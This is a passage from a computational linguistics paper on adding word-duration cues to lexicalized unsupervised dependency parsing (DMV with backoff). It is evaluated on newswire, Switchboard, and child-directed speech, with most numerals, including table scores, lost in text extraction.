pos tags as input, our work differs from nearly all previous work on unsupervised dependency parsing. while learned tags might be plausible in a model of language acquisition, gold tags certainly are not. to our knowledge, this is the first work to incorporate acoustic cues into an unsupervised system for learning full syntactic parses. the methods in this paper were inspired by our previous approach (pate and goldwater, ), which showed that word duration measurements could improve the performance of an unsupervised lexicalized syntactic chunker over a words-only baseline. however, that work was limited to hmm-like sequence models, tested on adult-directed speech (ads) only, and none of the models outperformed uniform-branching baselines. here, we extend our results to full dependency parsing, and experiment on transcripts of both spontaneous ads and child-directed speech (cds). our models using word duration outperform words-only baselines, along with the common cover link parser of seginer ( ) and the unsupervised partial parser of ponvert et al. ( ), both unsupervised lexicalized parsers that have obtained state-of-the-art results on standard newswire treebanks (though their performance here is worse, as our input lacks punctuation). we also outperform uniform-branching baselines.
syntax and word duration before presenting our models and experiments, we first discuss why word duration might be a useful cue to syntax. this section reviews the two possible reasons mentioned above: duration as a cue to prosodic structure, or as a cue to predictability.
. prosodic bootstrapping prosody is the structure of speech as conveyed by rhythm and intonation, which are, in turn, conveyed by such measurable phenomena as variation in fundamental frequency, word duration, and spectral tilt. prosodic structure is typically analyzed as imposing a shallow, hierarchical grouping structure on speech, with the ends of prosodic phrases (constituents) being cued in part by lengthening the last word of the phrase (beckman and pierrehumbert, ). the prosodic bootstrapping hypothesis (gleitman and wanner, ) points out that prosodic phrases are often also syntactic phrases, and proposes that language-acquiring infants exploit this correlation. specifically, if infants can learn about prosodic phrase structure using word duration (and fundamental frequency), they may be able to identify syntactic phrases more easily using word strings and prosodic trees than using word strings alone. several behavioral experiments support the connection between prosody and syntax and the prosodic bootstrapping hypothesis specifically. for example, there is evidence that adults use prosodic information for syntactic disambiguation (millotte et al., ; price et al., ) and to help in learning the syntax of an artificial language (morgan et al., ), while infants can use acoustic-prosodic cues for utterance-internal clause segmentation (seidl, ). on the computational side, we are aware of only our previous hmm-based chunkers (pate and goldwater, ), which learned shallow syntax from words, words and word durations, or words and hand-annotated prosody. using these chunkers, we found that using words plus prosodic annotation worked better than just words, and words plus word duration worked even better. while these results are consistent with the prosodic bootstrapping hypothesis, we suggested that predictability bootstrapping (see below) might be a more plausible explanation. other computational work has combined prosody with syntax, but only in supervised systems, and typically using hand-annotated prosodic information. for example, huang and harper ( ) used annotated prosodic breaks as a kind of punctuation in a supervised pcfg, while prosodic breaks learned in a semi-supervised way have been used as features for parse reranking (kahn et al., ) or pcfg state-splitting (dreyer and shafran, ). in contrast to these methods, our approach observes neither parse trees nor prosodic annotations.
. predictability bootstrapping on the basis of our hmm chunkers, we introduced the predictability bootstrapping hypothesis (pate and goldwater, ): the idea that word durations could be a useful cue to syntactic structure not (or not only) because they provide information about prosodic structure, but because they are a direct cue to syntactic predictability. it is well-established that talkers tend to pronounce words more quickly when they are more predictable, as measured by, e.g., word frequency, n-gram probability, or whether or not the word has been previously mentioned (aylett and turk, ; bell et al., ).
figure : example unlabeled dependency parse of "you threw it right at the basket".
however, syntactic probability also seems to matter, with studies showing that verbs tend to be pronounced more quickly when they are in their preferred syntactic frame—transitive vs. intransitive or direct object vs. sentential complement (gahl and garnsey, ; gahl et al., ; tily et al., ). while this syntactic evidence is only for verbs, taken together with the evidence for effects of other notions of predictability, it suggests that such syntactic effects may also be widespread.
if so, the duration of a word could give clues as to whether it is being used in a high-probability or low-probability structure, and thus what the correct structure is. we found that our syntactic chunkers benefited more from duration information than prosodic an- notations, providing some preliminary evidence in favor of predictability bootstrapping, but not ruling out prosodic bootstrapping. so, we are left with two plausible mechanisms by which word duration could help with learning syntax. slow pronunciations may cue the end of a prosodic phrase, which is sometimes also the end of a syntactic phrase. alternatively, slow pronunciations may indicate that the hidden syntactic structure is low probability, facilitating the induc- tion of a probabilistic grammar. this paper will not seek to determine which mechanism is useful, instead taking the presence of two possible mechanisms as encouraging for the prospect of incorporating word duration into unsupervised parsing. models as mentioned, we will be incorporating word dura- tion into unsupervised dependency parsing, produc- ing analyses like the one in figure . each arc is between two words, with the head at the non-arrow end of the arc, and the dependent at the arrow end. one word, the root, depends on no word, and all other words depend on exactly one word. following previous work on unsupervised dependency parsing, we will not label the arcs. the implementation of these models is available at http://github.com/jpate/predictabilityparsing . dependency model with valence all of our models are ultimately based on the de- pendency model with valence (dmv) of klein and manning ( ), a generative, probabilistic model for projective (i.e. no crossing arcs), unlabeled de- pendency parses, such as the one in figure . the dmv generates dependency parses using three probability distributions, which together com- prise model parameters θ. first, the root of the sentence is drawn from proot . second, we decide whether to stop generating dependents of the head h in direction dir ∈ {left, right} with probability pstop(·|h,dir,v), where v is t if h has a dir-ward dependent and f otherwise. if we decide to stop, then h takes no more dependents in the direction of dir. if we don’t stop, we use the third probability distribution pchoose(d|h,dir) to determine which de- pendent d to generate. the second and third step repeat for each generated word until all words have stopped generating in both directions. the dmv was the first unsupervised parsing model to outperform a uniform-branching baseline on the wall street journal corpus. it was trained using em to obtain a maximum-likelihood estimate of the parameters θ, and learned from pos tags to avoid rare events. however, all work on syntactic predictability effects on word duration has been lexi- calized (looking at, e.g., the transitivity bias of par- ticular verbs). in addition, it is unlikely that children have access to the correct parts of speech when first learning syntactic structure. thus, we want a dmv variant that learns from words rather than pos tags. we therefore adopt several extensions to the dmv due to headden et al. ( ), described next. . the dmv with backoff headden et al. ( ) sought to improve the dmv by incorporating lexical information in addition to pos tags. however, arcs between particular words are rare, so they modified the dmv in two ways to deal with this sparsity. 
first, they switched from mle to a bayesian approach, estimating a probability distribu- tion over model parameters θ and dependency trees t given the training corpus c and a prior distribution α over models: p(t,θ|c,α). headden et al. avoided overestimating the proba- bility of rare events that happen to occur in the train- ing data by picking α to assign low probability to models θ which give high probability to rare events. accordingly, models that overcommit to rare events will contribute little to the final average over models. specifically, headden et al. use dirichlet priors, with α being the dirichlet hyperparameters. headden et al.’s second innovation was to adapt in- terpolated backoff methods from language modeling with n-grams, where one can estimate the probabil- ity of word wn given word wn− by interpolating between unigram and bigram probability estimates: p̂(wn|wn− ) = λp(wn|wn− ) + ( −λ)p(wn) with λ ∈ [ , ]. ideally, λ should be large when wn− is frequent, and small when wn− is rare. headden et al. ( ) apply this method to the dmv by backing off from choose and stop distributions that condition on both head word and pos to distributions that condition on only the head pos. in the equation above, λ is a scalar parameter. however, it actually specifies a probability distri- bution over the decision to back off (b) or not back off (¬b), and we can use different notation to reflect this view. specifically, λstop(·) and λchoose(·) will represent our backoff distributions for the stop and choose decision, respectively. using hp and dp to represent head and dependent pos tag and hw and dw to represent head and dependent word, one of the models headden et al. explored estimates: p̂ choose(dp|hw,hp,dir,val) = λchoose(¬b|hw,hp,dir)pchoose(dp|hw,hp,dir) +λchoose(b|hw,hp,dir)pchoose(dp|hp,dir) ( ) with an analogous backoff for pstop . we can see from equation that p̂choose backs off from a dis- tribution that conditions on hw to a distribution that marginalizes out hw, and that the extent of backoff varies across hw; we can use this to back off more when we have less evidence about hw. this model only conditions on words; it does not generate them in the dependents. this means it is actually a condi- tional, rather than fully generative, model of observed pos tags and unobserved syntax conditioned on the observed words. since identifying the true posterior distribution p(t,θ|c,α) is intractable, headden et al. use mean- field variational bayes (kurihara and sato, ; johnson, ), which finds an approximation to the posterior using an iterative em-like algorithm. in the e-step of vbem, expected counts e(ri ) are gathered for each latent variable using the inside-outside algo- rithm, exactly as in the e-step of traditional em. the maximization step differs from the m-step of em in two ways. first, the expected counts for each value of the latent variable xi are incremented by the hy- perparameter αi. second, the numerator and denom- inator are scaled by the function exp(ψ(·)), which reduces the probability of rare events. specifically, the pchoose distribution is estimated using expecta- tions for each arc adp,h,dir from head h to dependent pos tag dp in direction dir, and the update equation for pchoose from iteration n to n + is: p̂n+ choose(dp|h,dir) = exp(ψ(en(adp,h,dir ) + αdp,h,dir )) exp(ψ( ∑ c(e n(ac,h,dir ) + αc,h,dir ))) ( ) where h is the head pos tag for the backoff distri- bution, and the head (word, pos) pair for the no backoff distribution. 
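written out with an explicit iteration index, the pchoose update just described can be rendered in latex as follows; ψ is the digamma function, e^n(·) are the expected arc counts gathered in the e-step at iteration n, and α are the dirichlet hyperparameters. this is only a restatement of equation ( ) above, not an additional result:

    \hat{p}^{\,n+1}_{\mathrm{choose}}(dp \mid h, dir) =
      \frac{\exp\big(\psi\big(E^{n}(a_{dp,h,dir}) + \alpha_{dp,h,dir}\big)\big)}
           {\exp\big(\psi\big(\sum_{c}\big(E^{n}(a_{c,h,dir}) + \alpha_{c,h,dir}\big)\big)\big)}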
the update equation for pstop is analogous. now consider the update equations for λchoose : λ̂n+ choose(¬b|hw,hp,dir) = exp(ψ(α¬b + ∑ c(e n(ac,hw,hp,dir )))) exp(ψ(αb + α¬b + ∑ c(e n(ac,hw,hp,dir )))) λ̂n+ choose(b|hw,hp,dir) = exp(ψ(αb)) exp(ψ(αb + α¬b + ∑ c(e n(ac,hw,hp,dir )))) only the ¬b numerator includes the expected counts, so as we see hw in direction dir more often, the ¬b numerator will swamp the b numerator. by picking αb larger than α¬b, we can bias our λ distribution to prefer backing off until we expect at least αb −α¬b arcs out of hw with tag hp in the direction of dir. to obtain good performance, headden et al. re- placed each word that appeared fewer than times in the training data with the token “unk.” we will also use such an unk cutoff. . dmv with duration we explore three models. one is a straightforward application of the dmv with backoff to words and (quantized) word duration, and the other two are fully- generative variants. we also consider using words and pos tags as input to these models. backoff mod- els are given two streams of information, providing two of word identity, pos tag, or word duration for each observed token. we call one stream the “back- off” stream, and the other the “extra” stream. backoff models learn a probability distribution conditioning on both streams, backing off to condition on only the backoff stream. our first words and duration model takes the du- ration as the extra stream and the word identity as the backoff stream, and, using ha to represent the acoustic information for the head, defines: p̂ choose(dw|hw,ha,dir) = λchoose(¬b|hw,ha,dir)pchoose(dw|hw,ha,dir) +λchoose(b|hw,ha,dir)pchoose(dw|hw,dir) ( ) with an analogous backoff scheme for pstop . we will refer to this conditional model as “cond.” in our experiments. this equation is similar to equation , except it uses words and duration instead of words and pos tags, and backs off to, not away from, words. we back off to the sparse words, rather than the less sparse duration, because duration provides almost no information about syntax in isolation. directly modelling the extra stream among the dependents may allow us to capture selectional re- strictions in pos and words models, or exploit ef- fects of syntactic predictability on dependent dura- tion. we therefore explore variants that generate both streams in the dependents. first, we examine a model (“joint”) that generates them jointly: p̂choose(dw,da|hw,hp,dir) = λchoose(¬b|hw,ha,dir) pchoose(dw,da|hw,ha,dir) +λchoose(b|hw,ha,dir) pchoose(dw,da|hw,dir) ( ) however, this joint model will have a very large state- space and may suffer from the same data sparsity, so we also explore a model (“indep.”) that generates the preliminary dev-set experiments confirmed this intuition, as models that backed off to word duration performed poorly. extra and backoff independently: p̂choose(dw,da|hw,hp,dir) = λchoose(¬b|hw,ha,dir) pchoose backoff (dw|hw,ha,dir) pchoose extra (da|hw,ha,dir) + λchoose(b|hw,ha,dir) pchoose backoff (dw|hw,dir) pchoose extra (da|hw,dir) ( ) we also modified the dmv with backoff to handle heavily lexicalized models. in headden et al. ( ), arcs between words that never appear in the same sentence are given probability mass only by virtue of the backoff distribution to pos tags, which all appear in the same sentence at least once. we want to both avoid relying on pos tags, and we also want to use held-out development and test sets to avoid implicitly overfitting the data when exploring different model structures. 
to this end, we add one extra αunk hyper- parameter to the dirichlet prior of pchoose for each combination of conditioning events. this hyperpa- rameter reserves probability mass for a head h to take a word dw as a dependent if h and dw never appeared together in the training data. the amount of probabil- ity mass reserved decreases as we see hw more often. this is implemented in training by adding αunk to the denominator of the pchoose update equation for each h and dir. at test time, if a word dw appears as an unseen dependent for head h, h takes dw as a dependent with probability: p̂ choose(dw|h,dir) = ( ) exp(ψ(αunk)) exp(ψ(αunk + ∑ c(e last(rc,h,dir ) + αc,h,dir ))) here, h may be a word, (word, pos) pair, or (word, duration) pair. since this event by definition never occurs in the training data, αunk does not appear in the numerator during training. note also that αunk is different from a global unk cutoff, which is imposed in preprocessing, and so effects every occur- rence of an an unk’d word in the model. αunk affects only dependents in pchoose , and treats a dependent as unk iff it did not occur on that particular side of that particular head word in any sentence. we used both global unk cutoffs (optimized on the dev set) and these αunk hyperparameters. train dev test w s j word tokens , , , word types , , sentences , s w b d n x t word tokens , , , word types , sentences , b r e n t word tokens , , , word types , sentences , table : statistics for our three corpora. finally, the conditional model ignores the extra stream in proot , and the generative models estimate proot over both streams jointly. experimental setup . datasets we evaluate on three datasets: wsj , sentences of length or less from the wall street journal por- tion of the penn treebank; swbdnxt , sentences of length or less from the switchboard dataset of ads used by pate and goldwater ( ); and brent, part of the brent corpus of cds (brent and siskind, ). table presents corpus statistics. . . wsj we present a new evaluation of the dmv with backoff on wsj , which does not have any acous- tic information, simply to verify that αunk performs sensibly on a standard corpus. additionally, headden et al. ( ) use an intensive initializer that relies on dozens of random restarts, and so, strictly speaking, only show that the backoff technology is useful for good initializations. our new evaluation will show that the backoff technology provides a substantial benefit even for harmonic initialization. wsj was created in the standard way; all punc- tuation and traces were removed, and sentences con- taining more than ten tokens were discarded. for our fully lexicalized version of wsj , all words were lowercased, and numbers were replaced with the token “number.” following standard practice, we used sections - for training, section for development, and section for test. wsj con- tains hand-annotated constituency parses, not depen- numbers were treated in this way only in wsj . dency parses, so we used the standard “constituency- to-dependency” conversion tool of johansson and nugues ( ) to obtain high-quality conll-style dependency parses. . . swbdnxt next, we evaluate on swbdnxt , which con- tains all sentences up to length from the same sections of the swbdnxt version of switchboard used by pate and goldwater ( ). short sentences are usually formulaic discourse responses (e.g. “oh ok”), so this dataset also excludes sentences shorter than three words. 
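the corpus preparation described above for wsj (stripping punctuation, lowercasing, mapping numerals to a shared "number" token, and keeping only sentences of at most ten tokens) can be sketched as follows; the function name and the regular expressions are illustrative assumptions, and trace removal is assumed to have happened when reading the treebank:

    import re

    def preprocess_wsj10(sentences):
        # sentences: list of token lists read from the treebank (traces already removed)
        cleaned = []
        for tokens in sentences:
            out = []
            for tok in tokens:
                if re.fullmatch(r"[^\w\s]+", tok):   # punctuation-only token
                    continue
                tok = tok.lower()
                if re.fullmatch(r"[\d.,/-]+", tok):  # numeral -> shared token
                    tok = "number"
                out.append(tok)
            if len(out) <= 10:                       # wsj10: at most ten tokens
                cleaned.append(out)
        return cleaned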
as our models successfully use word durations, this evaluation provides an important replication of the basic result from pate and goldwa- ter ( ) with a different kind of syntactic model. swbdnxt has a forced alignment of a dictionary-based phonetic transcription of each ut- terance to audio, providing our word duration infor- mation. as a very simple model of hyper-articulation and hypo-articulation, we classify a word as in the longest third duration, shortest third, or middle third. to minimize effects of word form, this classification was based on vowel count (counting a diphthong as one vowel): each word with n vowels is classified as in the shortest, longest, or middle tercile of duration among words with n vowels. like wsj , swbdnxt is annotated only with constituency parses, so to provide approximate “gold-standard” dependencies, we used the same constituency-to-dependency conversion tool as for wsj . we evaluated randomly-selected sen- tences to check the accuracy of the conversion tool, which was designed for newspaper text. excluding arcs involving words with no clear role in depen- dency structure (such as “um”), about % of the arcs were correct. while this rate is uncomfortably low, it is still much higher than unsupervised depen- dency parsers typically achieve, and so may provide a reasonable measure of relative dependency parse quality among competing systems. . . brent we also evaluated our models on the “large brent” dataset introduced in rytting et al. ( ), a por- tion of the brent corpus of child-directed speech (brent and siskind, ). we call this corpus brent. it consists of utterances from four of the mothers in brent and siskind’s ( ) study, and, like swbdnxt , has a forced alignment from which we obtain duration terciles. rytting et al. ( ) used a %/ % train/test partition. we extracted every ninth utterance from the original training partition to create a dev set, producing an %/ %/ % parti- tion. we also separated clitics from their base word. this dataset only has sentences longer than ten words, with a maximum length of words, so we discarded only sentences shorter than three words from the evaluation sets. the brent corpus is distributed via childes (macwhinney, ) with automatic dependency an- notations. however, these are not hand-corrected, and rely on a different tokenization of the dataset than is present on the transcription tier. to produce a reliable gold-standard, we annotated all sentences of length or greater from the development and test sets with dependencies drawn from the stanford typed dependency set (de marneffe and manning, ) using the annotation tool used for the copenhagen dependency treebank (kromann, ). . parameters in all experiments, hyperparameters for proot , pstop , and pchoose (and their backed-off distributions, and including αunk) were , αb was , and α¬b was . vbem was run on the training set until the data log-likelihood changed by less than . %, and then the parameters were held fixed and used to obtain viterbi parses for the evaluation sentences. finally, we explored different global unk cutoffs, replacing each word that appeared less than c times with the token unk. we ran each model for each c ∈ { , , , , }, and picked the best-scoring c on the development set for running on the test set and presentation here. we used a harmonic initializer similar to the one in klein and manning ( ). . 
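the duration terciles described above (shortest, middle, and longest third, computed separately among words with the same vowel count, counting a diphthong as one vowel) can be made concrete with a small sketch; the function name is illustrative, and durations are assumed to come from the forced alignment in seconds:

    import numpy as np

    def duration_terciles(durations, vowel_counts):
        # assign each token to the shortest / middle / longest duration tercile
        # among tokens that have the same number of vowels
        durations = np.asarray(durations, dtype=float)
        vowel_counts = np.asarray(vowel_counts)
        labels = np.empty(len(durations), dtype=object)
        for n in np.unique(vowel_counts):
            idx = np.where(vowel_counts == n)[0]
            lo, hi = np.percentile(durations[idx], [100 / 3, 200 / 3])
            for i in idx:
                if durations[i] <= lo:
                    labels[i] = "short"
                elif durations[i] <= hi:
                    labels[i] = "mid"
                else:
                    labels[i] = "long"
        return labels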
evaluation in addition to evaluating the various incarnations of the dmv with backoff and input types, we compare to uniform branching baselines, the common cover link (ccl) parser of seginer ( ), and the unsu- pervised partial parser (upp) of ponvert et al. ( ). the upp produces a constituency parse from words available at http://homepages.inf.ed.ac.uk/s /brentdep/ and punctuation using a series of finite-state chun- kers; we use the best-performing (probabilistic right linear grammar) version. the ccl parser produces a constituency parse using a novel “cover link” rep- resentation, scoring these links heuristically. both ccl and upp rely on punctuation (though according to ponvert et al. ( ), upp less so), which our in- put is missing. the left-headed “lh” (right-headed “rh”) baseline assumes that each word takes the first word to its right (left) as a dependent, and corre- sponds to a uniform right-branching (left-branching) constituency baseline. we evaluate the output of all models in terms of both constituency scores and dependency accu- racy. our wsj and swbdnxt corpora are originally annotated for constituency structure, with the dependency gold standard derived as described above, while our brent corpus is originally anno- tated for dependency structure, with the constituency gold standard derived by defining a constituent to span a head and each of its dependents (ignoring any one-word “constituents”). as the ccl and upp parsers don’t produce dependencies, only con- stituency scores are provided. for constituency scores, we present the standard unlabeled precision, recall, and f-measure scores. for dependency scores, we present directed attach- ment accuracy, undirected attachment accuracy, and the “neutral edge detection” (ned) score intro- duced by schwartz et al. ( ). directed attachment accuracy counts an arc as a true positive if it correctly identifies both a head and a dependent, whereas undi- rected attachment accuracy ignores arc direction in counting true positives. ned counts an arc as a true positive if it would be a true positive under the undi- rected attachment score, or if the proposed head is the gold-standard grandparent of the proposed depen- dent. this avoids penalizing parses for flipping an arc, such as making determiners, rather than nouns, the head of noun phrases. to assess statistical significance, we carried out stratified shuffling tests, with , random shuf- fles, for all measures. tables indicate significance differences between the backoff models and the most competitive baseline model on that measure, indi- cated by an italic score. a star (∗) indicates p < . , and a dagger (†) indicates p < . . to see the direc- tion of a significant difference (i.e. whether backoff wsj swbdnxt dependency constituency dependency constituency unk dir. undir. ned p r f unk dir. undir. ned p r f e m wds . . . . . . . . . . . . pos — . . . . . . — . . . . . . v b wds . . . . . . . . . . . . pos — . . . . . . — . . . . . . w ds + p o s cond. . † . † . ∗ . † . † . † . † . † . . † . † . † joint . . . . † . . ∗ . † . . † . † . . † indep. . † . † . † . † . † . † . † . . † . † . † . † lh — . . . . . . — . . . . . . rh — . . . . . . — . . . . . . ccl — — — — . . . — — — — . . . upp — — — — . . . — — — — . . . table : performance on wsj and swbdnxt for models using words and pos tags only. bold scores indicate the best performance of all models and baselines on that measure. 
† significantly different from best non-uniform baseline (italics) by a stratified shuffling test, p < . ; ∗: p < . . model is better or worse than the baseline), look to the scores themselves. results in all results, when a model sees only one kind of information, that is expressed by writing out the ab- breviation for the relevant stream: “wds” for words, “pos” for part-of-speech, “dur” for word duration. for baseline models that see two streams, the abbre- viations are joined by a “×” symbol (as they treat input pairs as atoms drawn in the cross-product of the two streams’ vocabulary). for the backoff models, the abbreviations are joined by a “+” symbol (as they combine the information sources with a weighted sum), with the “extra” stream name first. . results: wsj the left half of table presents results on wsj . for the baseline models, the first column with hori- zontal text indicates the input, while for the backoff (wds+pos) models, the first column with horizontal text indicates whether and how the extra stream is modeled in dependents (as described in section . ). the em model with pos input is largely a repli- cation of the original dmv, differing in the use of separate train, dev, and test sets, and possibly the details of the harmonic initializer. our replication achieves an undirected attachment score of . on the test set, similar to the score of . reported by klein and manning ( ) when training and evalu- ating on all of wsj . cohen et al. ( ) use the same train/dev/test partition that we do, and report a directed attachment score of . , similar to our directed attachment score of . . the vb model which learns from pos tags does not outperform the em model which learns from pos tags, suggesting that data sparsity does not hurt the dmv when using pos tags. as expected, the words- only models perform much worse than both the pos input models and the uniform lh baseline. vb does improve the words-only constituency performance. the cond. and indep. backoff models outperform the pos-only baseline on all measures, but the joint backoff model does not demonstrate a clear advan- tage over the pos-only baseline on any measure. the success of the indep. model indicates that modelling dependent word identity does provide enough infor- mation to justify the increase in sparsity. the failure of the joint model to provide a further improvement indicates that the extra information in the full joint over dependents does not justify the large increase in parameters. we also see that several models out- perform the lh baseline on dependencies, but the advantage is much less in f-score, underscoring the loss of information in the conversion of dependen- cies to constituencies. finally, all models outperform ccl and upp on f-score, emphasizing their reliance on the punctuation we removed. dependency constituency unk dir. undir. ned p r f e m wds . . . . . . wds×dur . . . . . . v b wds . . . . . . wds×dur . . . . . . d ur + w ds cond. . † . . † . † . † . † joint . † . † . ∗ . † . † . † indep. . † . † . † . † . † . † lh — . . . . . . rh — . . . . . . ccl — — — — . . . upp — — — — . . . ● ● switchboard model performance undirected attachment score c o n st itu e n cy f − sc o re ● ● wds wdsxdur cond. joint indep. lh table : performance on swbdnxt for models using words and duration. the scatterplot includes a subset of the information in the table: f-score and undirected attachment accuracy for backoff models and vb and lh baseline. bold, italics, and significance annotations as in table . . 
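to make the dependency scores in these tables concrete, the sketch below computes directed attachment, undirected attachment, and ned for a single sentence from gold and predicted head positions (1-based, with 0 marking the root); the list-of-heads representation is an assumption for illustration, but the scoring rules follow the definitions given above:

    def attachment_scores(gold_heads, pred_heads):
        # heads are 1-based positions of each token's head; 0 marks the root
        n = len(gold_heads)
        directed = undirected = ned = 0
        for dep in range(1, n + 1):
            g, p = gold_heads[dep - 1], pred_heads[dep - 1]
            # undirected credit: the same arc with its direction flipped
            flipped = p >= 1 and gold_heads[p - 1] == dep
            # ned credit: proposed head is the gold grandparent of the dependent
            grandparent = gold_heads[g - 1] if g >= 1 else 0
            if p == g:
                directed += 1
            if p == g or flipped:
                undirected += 1
            if p == g or flipped or p == grandparent:
                ned += 1
        return directed / n, undirected / n, ned / n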
results: swbdnxt the right half of table presents performance fig- ures on swbdnxt for input involving words and pos tags. as expected, the em and vb baselines perform best when learning from gold-standard pos tags, and we again see no benefit for the vb pos- only model compared to the em pos-only model. the pos-only baselines far outperform the uniform- attachment baselines on the dependency measures; to our knowledge this is the first demonstration outside the newspaper domain that the dmv outperforms a uniform branching strategy on these measures. the other comparisons among systems listed in table are largely inconclusive. models do com- paratively well on either the constituency or depen- dency evaluation, but not both. the backoff mod- els outperform the baseline pos-only models in the constituency evaluation, but underperform or match those same models in the dependency evaluation. conversely, most models outperform the lh base- line in the dependency evaluation, but not in the constituency evaluation. there are probably two causes for the ambiguity in these results. first, the noise in the dependency gold-standard may have over- whelmed any advantage from backoff. second, as we saw with wsj , the conversion from dependencies to constituencies removes information, which may explain the failure of any model to outperform the lh baseline in the constituency evaluation. table presents performance figures on swbdnxt for input involving words and duration, including a scatter-plot of undirected attachment against constituency f-score for the interesting comparisons. in the scatter-plot, models up and to the right performed better, and we see that the negative correlation between the dependency and constituency evaluations persists in words and dura- tion input. vb substantially outperforms em in the baselines, indicating that good smoothing is helpful when learning from words. other comparisons are again ambiguous; the dependency evaluation is noisy, and backoff models outperform baseline models on the constituency evaluation but not the lh baseline. still, the backoff models outperform all words-only baselines in constituency score, with two performing slightly worse in dependency score and one performing much better. so there is some evidence that word duration is useful, but we will find clearer evidence on the brent corpus. . results: brent table presents results on the brent dataset. vb is even more effective than in the other datasets for improving performance among baseline models, lead- ing to double-digit improvements on some measures. moreover, the best dev-set unk cutoff drops to for all vb models, indicating that, on this dataset, vb provides good smoothing even in models without backoff. this difference between datasets is likely related to differences in vocabulary diversity; the dependency constituency unk dir. undir. ned p r f e m wds . . . . . . wds×dur . . . . . . v b wds . . . . . . wds×dur . . . . . . d ur + w ds cond. . ∗ . ∗ . ∗ . . . ∗ joint . . . . . † . indep. . . † . † . † . . lh — . . . . . . rh — . . . . . . ccl — — — — . . . upp — — — — . . . ● ● brent model performance undirected attachment score c o n st itu e n cy f − sc o re ● ● wds wdsxdur cond. joint indep. lh table : performance on brent for models using words and duration. the scatterplot includes a subset of the information in the table: f-score and undirected attachment accuracy for backoff models and vb and lh baseline. bold, italics, and significance annotations as in table . 
type:token ratio in the brent training set is about : , compared to : and : in the wsj and swbdnxt training sets, respectively. more importantly for our main hypothesis, all three backoff models using words and duration out- perform the words-only baselines (including ccl and upp) on all dependency measures—the most accurate measures on this corpus, which has hand- annotated dependencies—and the cond. model also wins on f-score. conclusion in this paper, we showed how to use the dmv with backoff and two fully-generative variants to explore the utility of word duration in fully lexicalized un- supervised dependency parsing. although other re- searchers have incorporated features beyond words and pos tags into dmv-like models (e.g., semantics: naseem and barzilay ( ); morphology: berg- kirkpatrick et al. ( )), we believe this is the first example based on headden et al. ( )’s backoff method. as far as we know, our work is also the first test of a dmv-based model on transcribed conver- sational speech and the first to outperform uniform- branching baselines without using either pos tags or punctuation in the input. our results show that fully- lexicalized models can do well if they are smoothed properly and exploit multiple cues. our experiments also suggest that cds is espe- cially easy to learn from. model performance on the brent dataset was generally higher than on swbdnxt , with a much lower unk threshold. this latter point, and the fact that brent has a much lower word type/token ratio than the other datasets, suggest that cds provides more and clearer evidence about words’ syntactic behavior. finally, our results provide more evidence, using a different, more powerful syntactic model than that of pate and goldwater ( ), that word duration is a useful cue for unsupervised parsing. we found that several ways of incorporating duration were use- ful, although the extra sparsity of joint emissions was not justified in any of our investigations. our results are consistent with both the prosodic and pre- dictability bootstrapping hypotheses of language ac- quisition, providing the first computational support for these using a full syntactic parsing model and tested on child-directed speech. while our models do not provide a mechanistic account of how children might use duration information to help with learning syntax, they do show that this information is useful in principle, even without any knowledge of latent prosodic structure or its relationship to syntax. in ad- dition, our results suggest it may be useful to explore using word duration to enrich nlp tasks in speech- related technologies, such as syntactically-inspired language models for text-to-speech generation. in the future, we also hope to investigate why duration is helpful, designing experiments to tease apart the role of prosody and predictability in learning syntax. references matthew aylett and alice turk. . the smooth signal redundancy hypothesis: a functional explanation for re- lationships between redundancy, prosodic prominence, and duration in spontaneous speech. language and speech, ( ): – . mary beckman and janet pierrehumbert. . intona- tional structure in japanese and english. phonology yearbook, : – . alan bell, jason m brenier, michelle gregory, cynthia girand, and dan jurafsky. . predictability effects on durations of content and function words in conver- sational english. journal of memory and language, : – . taylor berg-kirkpatrick, alexandre bouchard-côté, john denero, and dan klein. . 
painless unsupervised learning with features. in proceedings of naacl. michael r brent and jeffrey m siskind. . the role of exposure to isolated words in early vocabulary de- velopment. cognition, : – . christos christodoulopoulos, sharon goldwater, and mark steedman. . turning the pipeline into a loop: iterated unsupervised dependency parsing and pos in- duction. in proceedings of the naacl-hlt workshop on the induction of linguistic structure, pages – , montréal, canada, june. association for computational linguistics. shay b cohen and noah a smith. . shared lo- gistic normal distributions for soft parameter tying in unsupervised grammar induction. in proceedings of naacl. shay b cohen, kevin gimpel, and noah a smith. . logistic normal priors for unsupervised probabilistic grammar induction. in advances in neural information processing systems . shay b cohen, dipanjan das, and noah a smith. . unsupervised structure prediction with non-parallel multilingual guidance. in proceedings of emnlp. marie-catherine de marneffe and christopher d manning. . stanford typed dependencies manual. technical report. markus dreyer and izhak shafran. . exploiting prosody for pcfgs with latent annotations. in proceed- ings of interspeech, antwerp, belgium, august. susanne gahl and susan m garnsey. . knowledge of grammar, knowledge of usage: syntactic probabilities affect pronunciation variation. language, : – . susanne gahl, susan m garnsey, cynthia fisher, and laura matzen. . “that sounds unlikely”: syntac- tic probabilities affect pronunciation. in proceedings of the th meeting of the cognitive science society. lila gleitman and eric wanner. . language acqui- sition: the state of the art. in eric wanner and lila gleitman, editors, language acquisition: the state of the art, pages – . cambridge university press, cam- bridge, uk. will headden, mark johnson, and david mcclosky. . improved unsupervised dependency parsing with richer contexts and smoothing. in proceedings of naacl- hlt. zhongqiang huang and mary harper. . appropri- ately handled prosodic breaks help pcfg parsing. in proceedings of naacl-hlt, pages – , los ange- les, california, june. association for computational linguistics. richard johansson and pierre nugues. . extended constituent-to-dependency conversion for english. in proceedings of nodalida . mark johnson. . why doesn’t em find good hmm pos-taggers. in proceedings of emnlp-conll, pages – . jeremy g kahn, matthew lease, eugene charniak, mark johnson, and mari ostendorf. . effective use of prosody in parsing conversational speech. in proceed- ings of hlt-emnlp, pages – . dan klein and christopher d. manning. . corpus- based induction of syntactic structure: models of de- pendency and constituency. in proceedings of acl, pages – . matthias trautner kromann. . the danish depen- dency treebank and the dtag treebank tool. in pro- ceedings of the second workshop on treebanks and linguistic theories, pages – . kenichi kurihara and taisuke sato. . variational bayesian grammar induction for natural language. in proceedings of the international colloquium on gram- matical inference, pages – . brian macwhinney. . the childes project: tools for analyzing talk. lawrence erlbaum associates, mah- wah, nj, third edition. séverine millotte, roger wales, and anne christophe. . phrasal prosody disambiguates syntax. lan- guage and cognitive processes, ( ): – . james l morgan, richard p meier, and elissa l newport. . 
